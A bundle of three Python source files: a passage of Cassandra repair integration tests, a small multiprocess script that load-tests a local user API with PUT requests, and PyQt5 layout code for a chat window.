Calls _cell_shadowed_by_range_tombstone with parallel repair
"""
self._cell_shadowed_by_range_tombstone(sequential=False)
@since('3.0')
def shadowed_range_tombstone_digest_sequential_repair_test(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=True)
@since('3.0')
def shadowed_range_tombstone_digest_parallel_repair_test(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=False)
@no_vnodes()
def simple_repair_order_preserving_test(self):
"""
Calls simple repair test with OPP and sequential repair
@jira_ticket CASSANDRA-5220
"""
self._simple_repair(order_preserving_partitioner=True)
def _simple_repair(self, order_preserving_partitioner=False, sequential=True):
"""
* Configure a three node cluster to not use hinted handoff, and to use batch commitlog
* Launch the cluster
* Create a keyspace at RF 3 and table
* Insert one thousand rows at CL ALL
* Flush on node3 and shut it down
* Insert one row at CL TWO
* Restart node3
* Insert one thousand more rows at CL ALL
* Flush all nodes
* Check node3 only has 2000 keys
* Check node1 and node2 have 2001 keys
* Perform the repair type specified by the parent test
* Assert the appropriate messages are logged
* Assert node3 now has all data
@jira_ticket CASSANDRA-4373
"""
if order_preserving_partitioner:
self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner')
self._populate_cluster()
self._repair_and_verify(sequential)
def _empty_vs_gcable_no_repair(self, sequential):
"""
Repairing empty partition and tombstoned partition older than gc grace
should be treated as the same and no repair is necessary.
@jira_ticket CASSANDRA-8979.
"""
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
self.create_ks(session, 'ks', 2)
# we create two tables, one has low gc grace seconds so that the data
# can be dropped during test (but we don't actually drop them).
# the other has default gc.
# compaction is disabled not to purge data
query = """
CREATE TABLE cf1 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH gc_grace_seconds=1
AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
query = """
CREATE TABLE cf2 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
# take down node2, so that only node1 has gc-able data
node2.stop(wait_other_notice=True)
for cf in ['cf1', 'cf2']:
# insert some data
for i in xrange(0, 10):
for j in xrange(0, 1000):
query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# delete those data, half with row tombstone, and the rest with cell range tombstones
for i in xrange(0, 5):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
for i in xrange(5, 10):
for j in xrange(0, 1000):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# sleep until gc grace seconds pass so that cf1 can be dropped
time.sleep(2)
# bring up node2 and repair
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check no rows will be returned
for cf in ['cf1', 'cf2']:
for i in xrange(0, 10):
query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL)
res = list(session.execute(query))
self.assertEqual(len(filter(lambda x: len(x) != 0, res)), 0, res)
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for cf1")
self.assertEqual(len(out_of_sync_logs), 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs]))
# check log for actual repair for non gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for cf2")
self.assertGreater(len(out_of_sync_logs), 0, "Non GC-able data should be repaired")
def _range_tombstone_digest(self, sequential):
"""
multiple range tombstones for same partition and interval must not create a digest mismatch as long
as the most recent tombstone is present.
@jira_ticket cassandra-11349.
"""
def withsession(session, node1):
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
node1.flush()
# recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2)
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
self._repair_digest(sequential, withsession)
def _cell_shadowed_by_range_tombstone(self, sequential):
"""
Cells shadowed by range tombstones must not effect repairs (given tombstones are present on all nodes)
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
self._repair_digest(sequential, withSession)
def _range_tombstone_shadowed_by_range_tombstone(self, sequential):
"""
Range tombstones shadowed by other range tombstones must not effect repairs
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'")
self._repair_digest(sequential, withSession)
def _repair_digest(self, sequential, populate):
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
self.create_ks(session, 'ks', 2)
query = """
CREATE TABLE IF NOT EXISTS table1 (
c1 text,
c2 text,
c3 text,
c4 float,
PRIMARY KEY (c1, c2, c3)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
populate(session, node1)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check log for no repair happened for gcable data
out_of_sync_logs = node2.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync for table1")
self.assertEqual(len(out_of_sync_logs), 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs])))
def local_dc_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -local repair on one DC
* Assert only nodes in that DC are repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
debug("starting repair...")
opts = ["-local"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 1, "Lines matching: {}".format(len(out_of_sync_logs)))
line, m = out_of_sync_logs[0]
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
valid_out_of_sync_pairs = {node1.address(), node2.address()}
self.assertEqual(out_of_sync_nodes, valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def dc_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11605',
flaky=True,
notes='flaky on Windows')
def dc_parallel_repair_test(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's, with -dcpar
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"]
opts += _repair_options(self.cluster.version(), ks="ks", sequential=False)
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
self.assertEqual(len(out_of_sync_logs), 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs]))
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
self.assertEqual(int(num_out_of_sync_ranges), 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, line))
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
# Check the repair was a dc parallel repair
if self.cluster.version() >= '2.2':
self.assertEqual(len(node1.grep_log('parallelism: dc_parallel')), 1, str(node1.grep_log('parallelism')))
else:
self.assertEqual(len(node1.grep_log('parallelism=PARALLEL')), 1, str(node1.grep_log('parallelism')))
def _setup_multi_dc(self):
"""
Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3').
After set up, node2 in dc1 lacks some data and needs to be repaired.
"""
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfer with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
# populate 2 nodes in dc1, and one node each in dc2 and dc3
cluster.populate([2, 1, 1]).start(wait_for_binary_proto=True)
node1, node2, node3, node4 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}")
session.execute("USE ks")
self.create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys
debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL)
node2.flush()
node2.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE)
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node1.watch_log_for_alive(node2)
insert_c1c2(session, keys=range(1001, 2001), consistency=ConsistencyLevel.ALL)
cluster.flush()
# Verify that only node2 has only 2000 keys and others have 2001 keys
debug("Checking data...")
self.check_rows_on_node(node2, 2000, missings=[1000])
for node in [node1, node3, node4]:
self.check_rows_on_node(node, 2001, found=[1000])
return cluster
@since('2.2')
def parallel_table_repair_noleak(self):
"""
@jira_ticket CASSANDRA-11215
Tests that multiple parallel repairs on the same table isn't
causing reference leaks.
"""
self.ignore_log_patterns = [
"Cannot start multiple repair sessions over the same sstables", # The message we are expecting
"Validation failed in", # Expecting validation to fail
"RMI Runtime", # JMX Repair failures
"Session completed with the following error", # The nodetool repair error
"ValidationExecutor", # Errors by the validation executor
"RepairJobTask" # Errors by the repair job task
]
cluster = self.cluster
debug("Starting cluster..")
cluster.populate([3]).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
# Start multiple repairs in parallel
threads = []
for i in range(3):
t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",))
threads.append(t)
t.start()
# Wait for the repairs to finish
for t in threads:
t.join()
found_message = False
# All nodes should reject multiple repairs and have no reference leaks
for node in cluster.nodelist():
if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0:
found_message = True
break
self.assertTrue(found_message)
@no_vnodes()
def token_range_repair_test(self):
"""
Test repair using the -st and -et options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-st', str(node3.initial_token), '-et', str(node1.initial_token)])
@no_vnodes()
def partitioner_range_repair_test(self):
"""
Test repair using the -pr option
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-pr'])
def _parameterized_range_repair(self, repair_opts):
"""
@param repair_opts A list of strings which represent cli args to nodetool repair
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1, using repair_opts
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns
opts = repair_opts
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
self.assertEqual(len(node1.grep_log('are consistent for standard1')), 0, "Nodes 1 and 2 should not be consistent.")
self.assertEqual(len(node3.grep_log('Repair command')), 0, "Node 3 should not have been involved in the repair.")
out_of_sync_logs = node1.grep_log("/([0-9.]+) and /([0-9.]+) have ([0-9]+) range\(s\) out of sync")
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
self.assertIn(out_of_sync_nodes, valid_out_of_sync_pairs, str(out_of_sync_nodes))
@since('2.2')
def trace_repair_test(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads to 2 and with tracing enabled
* Check the trace data was written, and that the right job thread count was used
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
debug("Inserting data...")
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=20K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
cluster.flush()
job_thread_count = '2'
opts = ['-tr', '-j', job_thread_count]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
session = self.patient_cql_connection(node1)
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
self.assertIn('job threads: {}'.format(job_thread_count),
rows[0][0],
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]))
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11836',
flaky=True,
notes='Windows')
@since('2.2')
def thread_count_repair_test(self):
"""
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on to node1, setting job threads
* Check the right job thread count was used
* Repeat steps 2 through 5 with all job count options
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
debug("Starting cluster..")
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
# Valid job thread counts: 1, 2, 3, and 4
for job_thread_count in range(1, 5):
debug("Inserting data...")
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count - 1), 2 * job_thread_count)])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=2K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate',
'threads=30', '-pop', 'seq={}..{}K'.format(2 * (job_thread_count), 2 * (job_thread_count + 1))])
node2.start(wait_for_binary_proto=True, wait_other_notice=True)
cluster.flush()
session = self.patient_cql_connection(node1)
session.execute("TRUNCATE system_traces.events")
opts = ['-tr', '-j', str(job_thread_count)]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
time.sleep(5) # Give the trace table some time to populate
rows = list(session.execute("SELECT activity FROM system_traces.events"))
# This check assumes that the only (or at least first) thing to write to `system_traces.events.activity` is
# the repair task triggered in the test.
self.assertIn('job threads: {}'.format(job_thread_count),
rows[0][0],
'Expected {} job threads in repair options. Instead we saw {}'.format(job_thread_count, rows[0][0]))
@no_vnodes()
def test_multiple_concurrent_repairs(self):
"""
@jira_ticket CASSANDRA-11451
Make sure we can run sub range repairs in parallel - and verify that we actually do repair
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(3).start(wait_for_binary_proto=True)
node1, node2, node3 = cluster.nodelist()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1M', 'no-warmup', '-schema', 'replication(factor=3)', '-rate', 'threads=30'])
node2.start(wait_for_binary_proto=True)
t1 = threading.Thread(target=node1.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node3.initial_token), str(node1.initial_token)),))
t2 = threading.Thread(target=node2.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node1.initial_token), str(node2.initial_token)),))
t3 = threading.Thread(target=node3.nodetool, args=('repair keyspace1 standard1 -st {} -et {}'.format(str(node2.initial_token), str(node3.initial_token)),))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
node1.stop(wait_other_notice=True)
node3.stop(wait_other_notice=True)
_, _, rc = node2.stress(['read', 'n=1M', 'no-warmup', '-rate', 'threads=30'], whitelist=True)
self.assertEqual(rc, 0)
RepairTableContents = namedtuple('RepairTableContents',
['parent_repair_history', 'repair_history'])
@since('2.2')
class TestRepairDataSystemTable(Tester):
"""
@jira_ticket CASSANDRA-5839
Tests the `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables by writing thousands of records
to a cluster, then ensuring these tables are in valid states before and
after running repair.
"""
def setUp(self):
"""
Prepares a cluster for tests of the repair history tables by starting
a 5-node cluster, then inserting 5000 values with RF=3.
"""
Tester.setUp(self)
self.cluster.populate(5).start(wait_for_binary_proto=True)
self.node1 = self.cluster.nodelist()[0]
self.session = self.patient_cql_connection(self.node1)
self.node1.stress(stress_options=['write', 'n=5K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)'])
self.cluster.flush()
def repair_table_contents(self, node, include_system_keyspaces=True):
"""
@param node the node to connect to and query
@param include_system_keyspaces if truthy, return repair information about all keyspaces. If falsey, filter out keyspaces whose name contains 'system'
Return a `RepairTableContents` `namedtuple` containing the rows in
`node`'s `system_distributed.parent_repair_history` and
`system_distributed.repair_history` tables. If `include_system_keyspaces`,
include all results. If not `include_system_keyspaces`, filter out
repair information about system keyspaces, or at least keyspaces with
'system' in their names.
"""
session = self.patient_cql_connection(node)
def execute_with_all(stmt):
return session.execute(SimpleStatement(stmt, consistency_level=ConsistencyLevel.ALL))
parent_repair_history = execute_with_all('SELECT * FROM system_distributed.parent_repair_history;')
repair_history = execute_with_all('SELECT * FROM system_distributed.repair_history;')
if not include_system_keyspaces:
parent_repair_history = [row for row in parent_repair_history
if 'system' not in row.keyspace_name]
repair_history = [row for row in repair_history if
'system' not in row.keyspace_name]
return RepairTableContents(parent_repair_history=parent_repair_history,
repair_history=repair_history)
@skip('hangs CI')
def initial_empty_repair_tables_test(self):
debug('repair tables:')
debug(self.repair_table_contents(node=self.node1, include_system_keyspaces=False))
repair_tables_dict = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)._asdict()
for table_name, table_contents in repair_tables_dict.items():
self.assertFalse(table_contents, '{} is non-empty'.format(table_name))
def repair_parent_table_test(self):
"""
Test that `system_distributed.parent_repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `parent_repair_history`.
"""
self.node1.repair()
parent_repair_history, _ = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
self.assertTrue(len(parent_repair_history))
@known_failure(failure_source='test',
jira_url='https://issues.apache.org/jira/browse/CASSANDRA-11298',
flaky=True,
notes='windows')
def repair_table_test(self):
"""
Test that `system_distributed.repair_history` is properly populated
after repair by:
- running repair on `node` and
- checking that there are a non-zero number of entries in `repair_history`.
"""
self.node1.repair()
_, repair_history = self.repair_table_contents(node=self.node1, include_system_keyspaces=False)
self.assertTrue(len(repair_history))
|
httpwrite.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, random
import moment
import multiprocessing
from httpinit import generateUser
para_list = []
for i in range(0,1000):
para_list.append(generateUser(i))
post_url = "http://192.168.99.100:4000/user/"
numprocess = 100
plist = []
def sendwriterequest():
st = moment.now().epoch()
for i in range(0,100):
j = random.randint(0,999)
#r = requests.put(post_url+para_list[i]["_id"],para_list[i])
r = requests.put(post_url+para_list[j]["_id"],para_list[j])
#print r.text
#print r.status_code
if(r.status_code != 200 or "status" in r.json()):
print i
print "write failed"
break
runt = moment.now().epoch() - st
print runt
####################################################
for i in range (0,numprocess):
p = multiprocessing.Process(target = sendwriterequest)
plist.append(p)
for i in range (0,numprocess):
plist[i].start()
|
gui.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
import os, sys, threading
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QTextCursor
from PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QFileDialog
from socket import *
class Ui_main(QtWidgets.QMainWindow):
def setupUi(self, main, port, usrname):
main.setObjectName("main")
main.setEnabled(True)
main.resize(640, 443)
main.setFixedSize(main.width(), main.height())
main.setMouseTracking(False)
main.setStyleSheet("QWidget {\n"
" background-color: #dcdcdc;\n"
" font-family: \"Noto Serif SC\";\n"
" font-weight: 500;\n"
"}\n"
"QPushButton {\n"
" color: #dcdcdc;\n"
" background-color: #262626;\n"
" font-family: \"Noto Serif SC\";\n"
" border-radius: 10px;\n"
" border: 1px solid #262626;\n"
"}\n"
"QPushButton:hover {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #262626;\n"
"}\n"
"QPushButton:pressed {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #dcdcdc;\n"
"}\n"
"QToolButton {\n"
" color: #dcdcdc;\n"
" background-color: #262626;\n"
" font-family: \"Noto Serif SC\";\n"
" border-radius: 10px;\n"
" border: 1px solid #262626;\n"
"}\n"
"QToolButton:hover {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #3f3f3f;\n"
"}\n"
"QToolButton:pressed {\n"
" color: #dcdcdc;\n"
" background-color: #3f3f3f;\n"
" font-family: \"Noto Serif SC\";\n"
" border: 1px solid #dcdcdc;\n"
"}\n"
"QTextBrowser {\n"
" background-color: #f5f5f5;\n"
" color: #262626;\n"
" border-radius: 10px;\n"
"}\n"
"QLineEdit {\n"
" background-color: #f5f5f5;\n"
" color: #262626;\n"
" text-indent: 10px;\n"
" border-radius: 10px;\n"
" padding-left: 10px;\n"
"}\n"
"QGraphicViews {\n"
" background-image: url(\'./yjs.png\');\n"
" background-size: 100% 100%;\n"
"}\n"
"QLabel {\n"
" border-radius: 10px;\n"
" background-color: #f5f5f5;\n"
"}\n"
"QScrollBar:vertical {\n"
" width: 10px;\n"
" border-radius: 5px;\n"
" border-top-left-radius: 0px;\n"
" border-bottom-left-radius: 0px;\n"
" background: #f5f5f5;\n"
" padding-top: 2px;\n"
" padding-bottom: 2px; \n"
"}\n"
"QScrollBar::handle:vertical {\n"
" background: #dcdcdc;\n"
" width: 8px;\n"
" border-radius: 4px;\n"
" margin-left: 0px;\n"
" margin-right: 2px;\n"
"}\n"
"QGraphicsView {\n"
" border-image: url(./yjs.png);\n"
# " background-size: 100% 100%;\n"
"}"
)
self.sendButton = QtWidgets.QPushButton(main)
self.sendButton.setGeometry(QtCore.QRect(570, 400, 61, 31))
self.sendButton.setAutoDefault(False)
self.sendButton.setDefault(False)
self.sendButton.setFlat(True)
self.sendButton.setObjectName("sendButton")
self.chatMsg = QtWidgets.QTextBrowser(main)
self.chatMsg.setGeometry(QtCore.QRect(10, 10, 511, 381))
self.chatMsg.setFrameShape(QtWidgets.QFrame.NoFrame)
self.chatMsg.setFrameShadow(QtWidgets.QFrame.Plain)
self.chatMsg.setLineWidth(1)
self.chatMsg.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)
self.chatMsg.setSizeAdjustPolicy(QtWidgets.QAbstractScrollArea.AdjustIgnored)
self.chatMsg.setOverwriteMode(True)
self.chatMsg.setObjectName("chatMsg")
self.inputMsg = QtWidgets.QLineEdit(main)
self.inputMsg.setGeometry(QtCore.QRect(10, 400, 551, 31))
self.inputMsg.setText("")
self.inputMsg.setFrame(False)
self.inputMsg.setEchoMode(QtWidgets.QLineEdit.Normal)
self.inputMsg.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.inputMsg.setCursorMoveStyle(QtCore.Qt.LogicalMoveStyle)
self.inputMsg.setClearButtonEnabled(False)
self.inputMsg.setObjectName("inputMsg")
self.chatroomName = QtWidgets.QLabel(main)
self.chatroomName.setGeometry(QtCore.QRect(530, 40, 101, 41))
self.chatroomName.setTextFormat(QtCore.Qt.AutoText)
self.chatroomName.setAlignment(QtCore.Qt.AlignCenter)
self.chatroomName.setWordWrap(True)
self.chatroomName.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)
self.chatroomName.setObjectName(port)
self.picsButton = QtWidgets.QToolButton(main)
self.picsButton.setGeometry(QtCore.QRect(530, 330, 31, 22))
self.picsButton.setObjectName("picsButton")
self.fileButton = QtWidgets.QToolButton(main)
self.fileButton.setGeometry(QtCore.QRect(530, 360, 31, 22))
self.fileButton.setCheckable(False)
self.fileButton.setChecked(False)
self.fileButton.setAutoExclusive(False)
self.fileButton.setObjectName("fileButton")
self.graphicsView = QtWidgets.QGraphicsView(main)
self.graphicsView.setGeometry(QtCore.QRect(530, 220, 101, 101))
self.graphicsView.setAutoFillBackground(False)
self.graphicsView.setFrameShape(QtWidgets.QFrame.NoFrame)
self.graphicsView.setFrameShadow(QtWidgets.QFrame.Plain)
self.graphicsView.setLineWidth(0)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.NoBrush)
self.graphicsView.setBackgroundBrush(brush)
self.graphicsView.setInteractive(False)
self.graphicsView.setObjectName("graphicsView")
